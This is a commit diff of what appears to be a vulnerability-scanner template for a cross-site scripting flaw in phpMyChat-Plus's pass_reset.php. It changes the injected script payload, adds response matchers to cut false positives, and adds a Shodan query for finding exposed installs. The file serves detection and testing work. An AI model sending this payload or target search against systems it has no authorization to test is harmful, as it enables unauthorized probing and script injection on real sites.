Fix FP CVE-2019-19908

2022-10-26 12:32:34 +05:30 · 2022-10-26 12:32:34 +05:30 · eebbc328fc
parent 7cc7a63dd4
commit eebbc328fc
1 changed files with 18 additions and 7 deletions
--- a/cves/2019/CVE-2019-19908.yaml
+++ b/cves/2019/CVE-2019-19908.yaml
@ -4,7 +4,8 @@ info:
  name: phpMyChat-Plus 1.98 - Cross-Site Scripting
  author: madrobot
  severity: medium
-  description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
+  description: |
+    phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
  reference:
    - https://cinzinga.github.io/CVE-2019-19908/
    - http://ciprianmp.com/
@ -15,20 +16,30 @@ info:
    cvss-score: 6.1
    cve-id: CVE-2019-19908
    cwe-id: CWE-79
-  tags: cve,cve2019,xss,injection,javascript
+  metadata:
+    verified: true
+    shodan-query: inurl:"/plus/pass_reset.php"
+  tags: cve,cve2019,phpMyChat,xss

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
+      - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
+
    matchers-condition: and
    matchers:
+      - type: word
+        part: body
+        words:
+          - 'username = "</script><script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
      - type: status
        status:
          - 200
-      - type: word
-        words:
-          - "<script>alert(1337)</script>"
-        part: body

 # Enhanced by mp on 2022/08/31